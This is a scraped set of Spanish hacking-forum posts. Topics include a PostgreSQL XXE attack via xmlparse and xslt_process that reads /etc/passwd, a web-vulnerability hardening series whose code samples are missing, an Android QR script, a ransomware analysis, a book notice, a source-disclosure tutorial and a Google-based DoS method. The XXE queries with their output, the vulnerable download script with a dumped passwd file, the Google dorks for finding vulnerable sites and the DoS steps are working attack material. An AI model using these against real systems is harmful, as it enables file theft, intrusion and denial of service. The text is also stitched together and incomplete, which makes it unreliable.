    select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');
     
        ERROR:  invalid XML document
        DETAILS:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
        exec 9<&0 </etc/fstab       ^
        /etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
        exec 9<&0 </etc/fstab        ^
        /etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
        exec 9<&0 </etc/fstab          ^
        Entity: line 1: parser error : Failure to process entity abc
        E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                                       ^
        Entity: line 1: parser error : Entity 'abc' not defined
        E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;                                                                               ^
     
    UPDATE!
    Classical XXE from XSLT transformation founded.
    Reading any data are possible also:
     
     
    SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*">  <xsl:element name="samples">    <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element>  </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
     
                                             xslt_process                                     
        -----------------------------------------------------------------------------------------
         <?xml version="1.0"?>
         <samples><sample>root:x:0:0:root:/root:/bin/bash
         daemon:x:1:1:daemon:/usr/sbin:/bin/sh
         bin:x:2:2:bin:/bin:/bin/sh
         sys:x:3:3:sys:/dev:/bin/sh
         sync:x:4:65534:sync:/bin:/bin/sync
         games:x:5:60:games:/usr/games:/bin/sh
         man:x:6:12:man:/var/cache/man:/bin/sh
         lp:x:7:7:lp:/var/spool/lpd:/bin/sh
         mail:x:8:8:mail:/var/mail:/bin/sh
         news:x:9:9:news:/var/spool/news:/bin/sh
         uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
         proxy:x:13:13:proxy:/bin:/bin/sh
         www-data:x:33:33:www-data:/var/www:/bin/sh
         backup:x:34:34:backup:/var/backups:/bin/sh
         list:x:38:38:Mailing List Manager:/var/list:/bin/sh
         irc:x:39:39:ircd:/var/run/ircd:/bin/sh
         gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
         nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
         libuuid:x:100:101::/var/lib/libuuid:/bin/sh
         nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
         sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
         puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
         Debian-exim:x:111:115::/var/spool/exim4:/bin/false
         alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
         oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
         mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
         postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
         oracle:x:1002:1002::/u01/app/oracle:/bin/bash
         </sample></samples>
     
        (1 row)


FUENTE: hackplayers
#32
Trataremos básicamente los principales fallos de una aplicación web que permiten a un atacante "operar" con determinado fin y finalidad.

Hace no mucho asistí (vía streaming tampoco os volvais locos) a una charla de mi amigo @chemaalonso cuyo título era "All the input is evil", lo cual viene a explicar que todos los datos de entrada en la aplicación son malignos.

La charla fue bastante amena y estoy seguro de que a partir de ahora cuando programeis una aplicación os acordareis del título e intentareis sanitizar y controlar al máximo los parámetros de entrada (aunque siempre hay algún cafre que antepone la funcionalidad a la seguridad). }:))


All The Input Is Evil I



1. - Inyecciones SQL básicas.

Típico caso vulnerable: news.php?new=123



Sabemos (y el programador debe de saberlo) que el código anterior es vulnerable a sql injection. También si nos fijamos sabemos que siempre usamos un id numérico, ¿entonces?
Para mi el código anterior sanitizado sería:



En casos en donde el parámetro de entrada tiene que ser alfanumérico, debemos de hacerlo de la siguiente forma:




2. - Ataque XSS (Cross Site Scripting)

Otro típico caso es el buscador en donde se imprime la palabra que se introdujo en el textbox.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Y aquí el código corregido sanitizando los parámetros de entrada:



¿Fácil no? Pues pegaros una sesión de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y vereis la cantidad de sitios que "pasan" de la seguridad.


Yo me voy a sentar esperando la segunda parte de esta entrada. }:)) Saludos!


All The Input Is Evil II

Segunda parte de esta entrega, esta vez poniendo solución a fallos relacionados con la inclusión de archivos ejecutables


1. - Inyecciones LFI & RFI (Local/Remote File Include).

Veamos el típico ejemplo de inclusión de archivos de forma dinámica convirtiendose en métodos inseguros.



En ochenta mil sitios van a decir que este código es vulnerable y hay que sanitizar la variable $file, yo digo que no. Lo que no hay es que realizar includes dinámicos directamente para no comprometer el servidor.

Sí, se podría sanitizar pero, ¿hasta que punto lo convertiríamos en un LFI? ¿Realmente es posible?
Claro que es posible filtrar los datos de entrada, pero es que no es necesario porque el mismo código se podría estructurar de otra forma más segura. Veamos:



Así y con un poco de código extra se pueden guardar los logs de los "hackers" que lo intentaron por esa vía y bloquear sus ips o hacer lo que se crea necesario.


2. - Inyecciones tipo SSI a partir de XSS (Server Side Includes).


Lo más típico, descubrir un fallo tipo XSS en un servidor Apache y probar si SSI está activado. Es sorprendente la cantidad de servidores que lo tienen activado y no lo usan, simplemente porque no saben que está ahí.

Llegados a este punto es fácil saber que de no existir el XSS  (All the input is evil - I de III) esto nunca llegaría a funcionar.

Así que para que repetir lo que ya sabemos, cuidado con las inyecciones tipo Cross Site Scripting porque son más de lo que parecen (nunca dijimos lo contrario).

Un poco de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sobre SSI };)


All The Input Is Evil III


Tercera y última parte de esta entrega, esta vez poniendo solución a fallos relacionados con la descarga de archivos y mostrando un simple buffer overflow.


1. - Arbitrary File Download (¿LFI?)

Veamos un simple ejemplo que debe de haber en más de mil páginas y que seguramente os habeis encontrado.




Todos vemos el fallo, pero no todos sabemos como solucionarlo.
He visto soluciones comprobando que el archivo contiene en la ruta /downloads/ y que se evade facilmente usando DT (Directory Transversal):

Así que el filtrado seguramente no es una buena opción.
¿Solución? Una muy chula para poder seguir usando el downloader de forma dinámica y no tener que modificar el código cada vez que subimos un archivo es usando una base de datos que almacene el hash original del archivo, su nombre y su ruta.

Así se accede mediante el hash y se hace una consulta a la base de datos (cuidado manazas de los sqli).



De esta forma evitamos que se pueda descargar cualquier cosa y solo se descargan los archivos que están en la base de datos.


2 . - Buffer Overflow


Están, existen, y son peligrosos. Vamos a ver una simple aplicación en ANSI C que es vulnerable.




La variable MyBuffer tiene espacio para 10 bytes, si copiamos más de 10 se producirá un Buffer Overflow. Para evitar esto tenemos tres opciones:

a) Comprobar que no llegan en el buffer de la función más de 10 bytes.
b) Copiar solo 10 bytes del buffer, lleguen los que lleguen.
c) Redimensionar el buffer en función de los datos que lleguen. Aunque esto podría ser un Heap Buffer Overflow.

Un ejemplo de como sería comprobando:



Ya sé que hay muchas vulnerabilidades en aplicaciones web y aplicaciones en general, pero está claro que esto es una simple entrega para solucionar algunos fallos muy comunes y de bastante riesgo.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
AUTOR: p0is0n-123
#33
Por WindHack:

Código: python
#-*- coding: utf-8 -*-

import android

droid = android.Android()
sCode = droid.scanBarcode()

#Debug
#print sCode

(sRslt, sType) = sCode.result['extras']['la.droid.qr.result'], sCode.result['extras']['SCAN_RESULT_FORMAT']
QMSG = '''
by .:WindHack:.
Tipo: %s

Contenido:
%s''' % (sType, sRslt)
droid.dialogCreateAlert('Resultado del Escáner', QMSG)
if sRslt.startswith('http'):
   droid.dialogSetPositiveButtonText('Abrir')
droid.dialogSetNeutralButtonText('Copiar contenido')
droid.dialogSetNegativeButtonText('Cerrar')
droid.dialogShow()
sResponse = droid.dialogGetResponse().result
if sResponse['which'] == 'positive':
   droid.view(sRslt)
elif sResponse['which'] == 'neutral':
   droid.setClipboard(sRslt)
   droid.notify('pyScanBarcode', 'Contenido copiado con éxito. ¡Gracias!')
elif sResponse['which'] == 'negative':
   exit()


#34
Sí, el virus de la policía sigue activo e infectado a usuarios. Lo interesante es que continúa evolucionando. Veremos en esta entrada qué novedades traen las últimas versiones, y cómo recuperar el control del sistema de manera muy sencilla si ha quedado infectado.

El malware de este tipo que secuestra el sistema, parece dar pasos en falso. A veces avanzan las técnicas de manera muy efectiva, y otras simplemente empeoran la efectividad de su producto. Veremos ahora algunos ejemplos.

La nueva moda es distribuir este tipo de troyanos en forma de DLL. Una librería de Windows no es más que un ejecutable, en realidad. De hecho, su "magic number" es el mismo, MZ. ¿Cómo se ejecuta una DLL? Existen dos formas, con regsvr32.exe (pasándole como parámetro la DLL) o con rundll32.exe, pasándole como parámetro la DLL y además, una función que se encuentre dentro.



¿Y si no conocemos la función dentro de la DLL? No importa. Se invocará al main (la rutina de iniciación principal) de la DLL y ejecutará su código igualmente. Por tanto, realmente el segundo parámetro de rundll32, en este caso, da igual. Para una víctima, esto es irrelevante puesto que todo el código (sea en forma de ejecutable o DLL) se ejecutará a través de vulnerabilidades.

Una vez lanzado el malware, se copia a la carpeta de inicio del usuario. En ella introduce un enlace (.lnk) que apunta al lanzamiento de la DLL.



No os dejéis engañar por la extensión (modificada por el troyano). Police.exe sigue siendo una DLL, no un ejecutable. Posicionándose en la carpeta de inicio, es fácilmente eludible, puesto que simplemente se puede arrancar con otro usuario o bien en modo a prueba de fallos. Pero veremos otra manera de eludir el troyano más adelante.




¿Por qué distribuirse en forma de DLL?

Puede tratarse de un intento de despiste para los antivirus. Al ser lanzado como parámetro de un programa legítimo (rundll32.exe, que seguro se encuentra en las listas blancas de todos los motores), cabe la posibilidad de que algún antivirus se "relaje". Una vez en memoria, el troyano estará a salvo del antivirus.

Otra razón que se nos ocurre es por intentar evitar las sandboxes que ejecutan automáticamente malware. Casas antivirus, investigadores, sandoboxes públicas, etc, suelen contar con máquinas que lanzan automáticamente los ejecutables con la idea de estudiarlos y tener una primera aproximación del comportamiento de la muestra. Si es sospechoso pasa a un análisis manual. En principio, una DLL con extensión de ejecutable daría error de ejecución, y por tanto se tomaría de forma automática como ejecutable corrupto, a no ser que el sistema esté específicamente diseñado para comprobar que se trata de una DLL y lanzarla como tal, cosa que no ocurre normalmente......

Internet Explorer en modo kiosko, cómo eludirlo

Una vez lanzado el malware, encontramos otra novedad. Ahora, en vez de mostrar una aplicación sin bordes que ocupe toda la pantalla, o un BMP que impide acceder al escritorio, se cierran todas las aplicaciones abiertas y se lanza un Internet Explorer en modo kiosko. Esta es una opción legítima del navegador, diferente a pantalla completa, que permite navegar sin acceso al sistema y con muchas otras restricciones. Cualquiera puede probarlo lanzando en el sistema el comando:

C:\Program Files\Internet Explorer>iexplore.exe k

Desde este punto, escapar del troyano se reduce a intentar escapar del modo kiosko. El troyano, aunque intenta restringir de varias formas el acceso a la máquina, no lo consigue. De hecho, es perfectamente posible escapar con sencillos pasos. Algo que que se puede hacer es desconectar la máquina de Internet, para que la visita a la web que aloja la imagen que bloquea el sistema no pueda ser accedida. De esta manera Internet Explorer dará un error de conexión. En XP, por ejemplo, se puede aprovechar el diagnóstico de conexión, en el apartado de más información.



Aunque, a causa de las restricciones impuestas por el troyano, no se podrá acceder al disco libremente.



Aun así, poco después de aparecer este error, Internet Explorer dejará de funcionar, se podrá recuperar el escritorio.

En Windows 7 todavía es más sencillo. Se puede usar por ejemplo el menú contextual del envío de correo por Mai


Y, en ese nuevo navegador, ir hacia c:\windows\system32 y ejecutar un explorador.




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#35
Python / Inmersion en Python 3 [Libro]
Mayo 19, 2012, 04:52:37 AM
Traducción al español de uno de los libros de referencia para quienes quieran empezar con Python.

Dive Into Python 3, es una revisión del considerado como uno de los libros sagrados sobre Python un lenguaje de programación de propósito general, orientado a objetos y usado, entre otros propósitos, para el desarrollo web.

Escrito por el autor de la obra original y uno de los gurús del desarrollo web, Mark Pilgrim, este nuevo libro que incluye un 80% de material actualizado respecto a la versión original fue presentado con una licencia Creative Commons Atribución-CompartirIgual.

Como consecuencia de lo anterior José Miguel González Aguilera está llevando a cabo una traducción del mismo al español del que por el momento encontramos una traducción de los capítulos 1 a 14.

Si estas interesado en esta versión en español de la última edición del libro de Mark Pilgrim "Dive Into Python 3" puedes acceder a la descarga de Inmersión en Python 3 desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Python, nombrado como lenguaje de programación del año durante 2010, está actualmente en la versión 3.2.2.

Si además quieres disponer de otra obra de referencia de Mark Pilgrim tienes a tu disposición la que muchos consideran la biblia de la última versión del lenguaje básico de la web "Dive into HTML5".

Fuente de la info: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Un saludo.
#36
0×01: Introducción

Full Source Disclosure es una vulnerabilidad que permite descargar cualquier tipo de archivo del servidor/web, permitiendo asi ver el codigo fuente de la misma web incluyendo la DB. Muchas veces se presenta, Como ejemplo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

0×02: Explotacion de la vulnerabilidad


Primero procedemos a descargar el archivo vulnerable, para ver su funcionamiento, en primera instancia esto es importante para poder determinar los demas archivos hasta llegar a nuestro objetivo clave, la base de datos.

Código: text
  <?
    require ("../Include/PathWeb.php");
    $Archivo     = $_GET["Archivo"];
    $PathCompleto    = $DirWeb."/".$_GET["Path"]."/".$Archivo;

    $file_extension = strtolower(substr(strrchr($Archivo,"."),1));

    switch ($file_extension) {
    case "pdf": $ctype="application/pdf"; break;
    case "exe": $ctype="application/octet-stream"; break;
    case "zip": $ctype="application/zip"; break;
    case "doc": $ctype="application/msword"; break;
    case "xls": $ctype="application/vnd.ms-excel"; break;
    case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
    case "gif": $ctype="image/gif"; break;
    case "png": $ctype="image/png"; break;
    case "jpe": case "jpeg":
    case "jpg": $ctype="image/jpg"; break;
    default: $ctype="application/force-download";
    }
    if (!file_exists($PathCompleto)) die("NO EXISTE EL ARCHIVO: $PathCompleto");

    header("Pragma: public");
    header("Expires: 0″);
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0″);
    header("Cache-Control: private",false);
    header("Content-Type: $ctype");
    header("Content-Disposition: attachment; filename=\"".basename($Archivo)."\";");
    header("Content-Transfer-Encoding: binary");
    header("Content-Length: ".@filesize($PathCompleto));
    set_time_limit(0);
    @readfile("$PathCompleto") or die("Archivo no encontrado.");
    ?>


Como vemos la variable archivo pasa por una mala comprobacion de la misma, por lo tanto podremos bajar y ver el codigo fuente de cualquier archivo que nosotros queramos. Con un poco de ingenio podemos ir buscando por los demas archivos hospedados, vemos que en descargas.php aparece la linea require ("../Include/PathWeb.php"); asi que prodeceremos a descargar ese archivo, buscando un poco encontre un panel de administracion, mire el action del formulario




Veo que apunta a Login.php, asi que bajando el archivo con el downloader vulnerable seguramente encontremos la DB.



Si tenemos suerte encontraremos el phpmyadmin y lo demas a imaginacion.

Tambien como dije al principio, pasaria a ser vulnerable el servidor, por lo que si intentamos descargar un archivo de el conociendo su ruta obviamente podremos verlo, como ejemplo tomo el famoso /etc/passwd:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: text
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/bin/true
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
admin:x:500:500::/home/admin:/bin/bash
majordomo:x:91:91:Majordomo List Manager:/usr/lib/majordomo:/bin/bash
fpweb:x:501:501::/home/fpweb:/bin/bash
tomcat4:x:100:101:Tomcat4:/var/tomcat4:/bin/bash
clamav:x:101:102:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
vhbackup:x:502:502::/home/vhbackup:/bin/bash
admin174:x:504:504::/home/virtual/site174/fst:/bin/false
admin102:x:509:509::/home/virtual/site102/fst:/bin/false
admin289:x:515:515::/home/virtual/site289/fst:/bin/false
admin177:x:518:518::/home/virtual/site177/fst:/bin/false
admin173:x:519:519::/home/virtual/site173/fst:/bin/false
admin18:x:522:522::/home/virtual/site18/fst:/bin/false
admin270:x:525:525::/home/virtual/site270/fst:/bin/false
admin22:x:538:538::/home/virtual/site22/fst:/bin/false
admin234:x:539:539::/home/virtual/site234/fst:/bin/false
admin21:x:540:540::/home/virtual/site21/fst:/bin/false
admin163:x:541:541::/home/virtual/site163/fst:/bin/false
admin235:x:544:544::/home/virtual/site235/fst:/bin/false
admin19:x:547:547::/home/virtual/site19/fst:/bin/false
admin28:x:548:548::/home/virtual/site28/fst:/bin/false
admin11:x:554:554::/home/virtual/site11/fst:/bin/false
admin233:x:555:555::/home/virtual/site233/fst:/bin/false
admin108:x:556:556::/home/virtual/site108/fst:/bin/false
admin30:x:570:570::/home/virtual/site30/fst:/bin/false
admin1:x:575:575::/home/virtual/site1/fst:/bin/false
admin321:x:578:578::/home/virtual/site321/fst:/bin/false
admin192:x:580:580::/home/virtual/site192/fst:/bin/false
admin320:x:595:595::/home/virtual/site320/fst:/bin/false
admin71:x:602:602::/home/virtual/site71/fst:/bin/false
admin41:x:604:604::/home/virtual/site41/fst:/bin/false
admin37:x:606:606::/home/virtual/site37/fst:/bin/false
admin400:x:610:610::/home/virtual/site400/fst:/bin/false
admin91:x:611:611::/home/virtual/site91/fst:/bin/false
admin90:x:612:612::/home/virtual/site90/fst:/bin/false
admin371:x:613:613::/home/virtual/site371/fst:/bin/false
admin45:x:614:614::/home/virtual/site45/fst:/bin/false
admin47:x:616:616::/home/virtual/site47/fst:/bin/false
admin398:x:617:617::/home/virtual/site398/fst:/bin/false
admin379:x:626:626::/home/virtual/site379/fst:/bin/false
admin5:x:627:627::/home/virtual/site5/fst:/bin/false
admin360:x:630:630::/home/virtual/site360/fst:/bin/false
admin407:x:632:632::/home/virtual/site407/fst:/bin/false
admin92:x:634:634::/home/virtual/site92/fst:/bin/false
admin94:x:635:635::/home/virtual/site94/fst:/bin/false
admin7:x:638:638::/home/virtual/site7/fst:/bin/false
admin374:x:647:647::/home/virtual/site374/fst:/bin/false
admin78:x:656:656::/home/virtual/site78/fst:/bin/false
admin365:x:659:659::/home/virtual/site365/fst:/bin/false
admin399:x:660:660::/home/virtual/site399/fst:/bin/false
admin54:x:662:662::/home/virtual/site54/fst:/bin/false
admin52:x:664:664::/home/virtual/site52/fst:/bin/false
admin88:x:665:665::/home/virtual/site88/fst:/bin/false
admin96:x:666:666::/home/virtual/site96/fst:/bin/false
admin74:x:670:670::/home/virtual/site74/fst:/bin/false
admin58:x:672:672::/home/virtual/site58/fst:/bin/false
admin369:x:678:678::/home/virtual/site369/fst:/bin/false
admin50:x:685:685::/home/virtual/site50/fst:/bin/false
admin87:x:686:686::/home/virtual/site87/fst:/bin/false
admin66:x:689:689::/home/virtual/site66/fst:/bin/false
admin67:x:690:690::/home/virtual/site67/fst:/bin/false
admin35:x:691:691::/home/virtual/site35/fst:/bin/false
admin89:x:692:692::/home/virtual/site89/fst:/bin/false
admin72:x:705:705::/home/virtual/site72/fst:/bin/false
admin341:x:706:706::/home/virtual/site341/fst:/bin/false
admin356:x:707:707::/home/virtual/site356/fst:/bin/false
admin357:x:708:708::/home/virtual/site357/fst:/bin/false
admin355:x:709:709::/home/virtual/site355/fst:/bin/false
admin354:x:711:711::/home/virtual/site354/fst:/bin/false
admin53:x:719:719::/home/virtual/site53/fst:/bin/false
admin105:x:725:725::/home/virtual/site105/fst:/bin/false
admin118:x:728:728::/home/virtual/site118/fst:/bin/false
admin124:x:732:732::/home/virtual/site124/fst:/bin/false
admin126:x:734:734::/home/virtual/site126/fst:/bin/false
admin132:x:741:741::/home/virtual/site132/fst:/bin/false
admin133:x:742:742::/home/virtual/site133/fst:/bin/false
admin134:x:743:743::/home/virtual/site134/fst:/bin/false
admin31:x:746:746::/home/virtual/site31/fst:/bin/false
admin14:x:748:748::/home/virtual/site14/fst:/bin/false
admin138:x:756:756::/home/virtual/site138/fst:/bin/false
admin140:x:758:758::/home/virtual/site140/fst:/bin/false
castellanosbk:x:760:760::/home/castellanosbk:/bin/bash
admin70:x:763:763::/home/virtual/site70/fst:/bin/false
admin142:x:764:764::/home/virtual/site142/fst:/bin/false
admin143:x:765:765::/home/virtual/site143/fst:/bin/false
admin86:x:767:767::/home/virtual/site86/fst:/bin/false
admin155:x:780:780::/home/virtual/site155/fst:/bin/false
admin158:x:783:783::/home/virtual/site158/fst:/bin/false
admin125:x:788:788::/home/virtual/site125/fst:/bin/false
admin170:x:794:794::/home/virtual/site170/fst:/bin/false
admin29:x:801:801::/home/virtual/site29/fst:/bin/false
admin148:x:812:812::/home/virtual/site148/fst:/bin/false
admin82:x:814:814::/home/virtual/site82/fst:/bin/false
admin130:x:815:815::/home/virtual/site130/fst:/bin/false
admin179:x:823:823::/home/virtual/site179/fst:/bin/false
admin75:x:829:829::/home/virtual/site75/fst:/bin/false
admin187:x:832:832::/home/virtual/site187/fst:/bin/false
admin188:x:833:833::/home/virtual/site188/fst:/bin/false
admin131:x:837:837::/home/virtual/site131/fst:/bin/false
admin100:x:839:839::/home/virtual/site100/fst:/bin/false
admin129:x:840:840::/home/virtual/site129/fst:/bin/false
admin65:x:845:845::/home/virtual/site65/fst:/bin/false
admin16:x:846:846::/home/virtual/site16/fst:/bin/false
admin81:x:849:849::/home/virtual/site81/fst:/bin/false
admin10:x:850:850::/home/virtual/site10/fst:/bin/false
admin13:x:851:851::/home/virtual/site13/fst:/bin/false
admin48:x:853:853::/home/virtual/site48/fst:/bin/false
admin59:x:856:856::/home/virtual/site59/fst:/bin/false
admin20:x:857:857::/home/virtual/site20/fst:/bin/false
admin63:x:858:858::/home/virtual/site63/fst:/bin/false
admin110:x:864:864::/home/virtual/site110/fst:/bin/false
admin117:x:867:867::/home/virtual/site117/fst:/bin/false
admin139:x:870:870::/home/virtual/site139/fst:/bin/false
admin144:x:871:871::/home/virtual/site144/fst:/bin/false
admin145:x:872:872::/home/virtual/site145/fst:/bin/false
admin146:x:873:873::/home/virtual/site146/fst:/bin/false
admin153:x:876:876::/home/virtual/site153/fst:/bin/false
admin164:x:882:882::/home/virtual/site164/fst:/bin/false
admin107:x:889:889::/home/virtual/site107/fst:/bin/false
admin127:x:890:890::/home/virtual/site127/fst:/bin/false
admin32:x:893:893::/home/virtual/site32/fst:/bin/false
admin68:x:895:895::/home/virtual/site68/fst:/bin/false
admin85:x:897:897::/home/virtual/site85/fst:/bin/false
admin119:x:898:898::/home/virtual/site119/fst:/bin/false
admin3:x:899:899::/home/virtual/site3/fst:/bin/false
admin111:x:901:901::/home/virtual/site111/fst:/bin/false
admin25:x:906:906::/home/virtual/site25/fst:/bin/false
admin73:x:908:908::/home/virtual/site73/fst:/bin/false
admin9:x:911:911::/home/virtual/site9/fst:/bin/false
admin36:x:919:919::/home/virtual/site36/fst:/bin/false
admin101:x:920:920::/home/virtual/site101/fst:/bin/false
admin56:x:923:923::/home/virtual/site56/fst:/bin/false
admin122:x:929:929::/home/virtual/site122/fst:/bin/false
admin2:x:930:930::/home/virtual/site2/fst:/bin/false
admin44:x:933:933::/home/virtual/site44/fst:/bin/false
admin42:x:934:934::/home/virtual/site42/fst:/bin/false
admin79:x:937:937::/home/virtual/site79/fst:/bin/false
admin80:x:938:938::/home/virtual/site80/fst:/bin/false
admin97:x:939:939::/home/virtual/site97/fst:/bin/false
admin113:x:943:943::/home/virtual/site113/fst:/bin/false
admin128:x:947:947::/home/virtual/site128/fst:/bin/false
admin61:x:949:949::/home/virtual/site61/fst:/bin/false
admin137:x:953:953::/home/virtual/site137/fst:/bin/false
admin141:x:954:954::/home/virtual/site141/fst:/bin/false
admin150:x:957:957::/home/virtual/site150/fst:/bin/false
admin152:x:959:959::/home/virtual/site152/fst:/bin/false
admin154:x:960:960::/home/virtual/site154/fst:/bin/false
admin162:x:962:962::/home/virtual/site162/fst:/bin/false
admin165:x:963:963::/home/virtual/site165/fst:/bin/false
admin15:x:964:964::/home/virtual/site15/fst:/bin/false
admin4:x:965:965::/home/virtual/site4/fst:/bin/false
admin17:x:966:966::/home/virtual/site17/fst:/bin/false
admin6:x:967:967::/home/virtual/site6/fst:/bin/false
admin24:x:968:968::/home/virtual/site24/fst:/bin/false
admin34:x:972:972::/home/virtual/site34/fst:/bin/false
admin83:x:973:973::/home/virtual/site83/fst:/bin/false
admin49:x:974:974::/home/virtual/site49/fst:/bin/false
admin27:x:977:977::/home/virtual/site27/fst:/bin/false
admin23:x:978:978::/home/virtual/site23/fst:/bin/false
admin103:x:980:980::/home/virtual/site103/fst:/bin/false
admin60:x:981:981::/home/virtual/site60/fst:/bin/false
admin93:x:983:983::/home/virtual/site93/fst:/bin/false
admin104:x:984:984::/home/virtual/site104/fst:/bin/false
admin55:x:985:985::/home/virtual/site55/fst:/bin/false
admin33:x:986:986::/home/virtual/site33/fst:/bin/false
admin39:x:987:987::/home/virtual/site39/fst:/bin/false
admin38:x:988:988::/home/virtual/site38/fst:/bin/false
admin8:x:989:989::/home/virtual/site8/fst:/bin/false
admin43:x:990:990::/home/virtual/site43/fst:/bin/false
admin51:x:991:991::/home/virtual/site51/fst:/bin/false
admin57:x:992:992::/home/virtual/site57/fst:/bin/false
admin62:x:993:993::/home/virtual/site62/fst:/bin/false
admin95:x:995:995::/home/virtual/site95/fst:/bin/false
admin26:x:996:996::/home/virtual/site26/fst:/bin/false
admin69:x:997:997::/home/virtual/site69/fst:/bin/false
admin40:x:998:998::/home/virtual/site40/fst:/bin/false
admin99:x:999:999::/home/virtual/site99/fst:/bin/false
admin12:x:1000:1000::/home/virtual/site12/fst:/bin/false
admin46:x:1001:1001::/home/virtual/site46/fst:/bin/false
admin76:x:1002:1002::/home/virtual/site76/fst:/bin/false
admin77:x:1003:1003::/home/virtual/site77/fst:/bin/false
admin84:x:1004:1004::/home/virtual/site84/fst:/bin/false
admin98:x:1005:1005::/home/virtual/site98/fst:/bin/false
admin106:x:1006:1006::/home/virtual/site106/fst:/bin/false


0×03: Dorks mas comunes

inurl:download.php?file=
inurl:download.php?path=
inurl:download.php?song=
inurl:descarga.php?archivo=
inurl:descarga.php?file=
inurl:descarga.php?arc=
inurl:download.php?*=*.doc

En si esta vulnerabilidad esta bastante conocida por la mayoria de nosotros, pero estuve viendo que en el foro no hay mucha informacion acerca de ella, asi que considero a este mini-tutorial un aporte.

FUENTE: InfiernoHacker
#37
Panos Ipeirotis, profesor de la Universidad de Nueva York ha descubierto accidentalmente una forma muy sencilla de realizar un ataque DoS a través de los servidores de Google.

Esto podría suponer la disposición de una herramienta muy "destructiva" capaz de generar más de 100 peticiones por segundo y ofrecer a un atacante cierto anonimato.

¿Qué que permite esto?

Pues aparentemente Google utiliza el agente Feedfetcher como recolector de todo tipo de URLs (no sólo feeds) y, como las URLs pueden ser privadas, Google no las cachea porque no puede almacenar datos personales. Esto hace que el crawler se tenga que lanzar periodicamente cada hora, con el añadido de que Feedfetcher ignora el fichero robots.txt. Además Google tampoco puede limitar el tráfico a dominios enormes como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que tienen terabytes de contenido web, por lo que un ataque a un sitio alojado en Amazon o un gran dominio de Internet sería posible.

¿Y cual es la técnica para realizar el ataque?

Panos explica un sencillo procedimiento para utilizar a Google como medio para atacar a otros sitios:

1.- Conseguir un gran número de URLs del sitio web objetivo. Preferiblemente URLs con ficheros grandes (jpg, pdf, etc.)
2.- Poner las URLs en un feed de Google Reader, o dentro de una hoja de cálculo (Google spreadsheet) en Docs
3.- Poner el feed dentro de un servicio de Google, o usar el comando image(url) en Google spreadsheet
4.- Sentarse y ver como Google lanza un ataque de denegación de servicio contra el objetivo

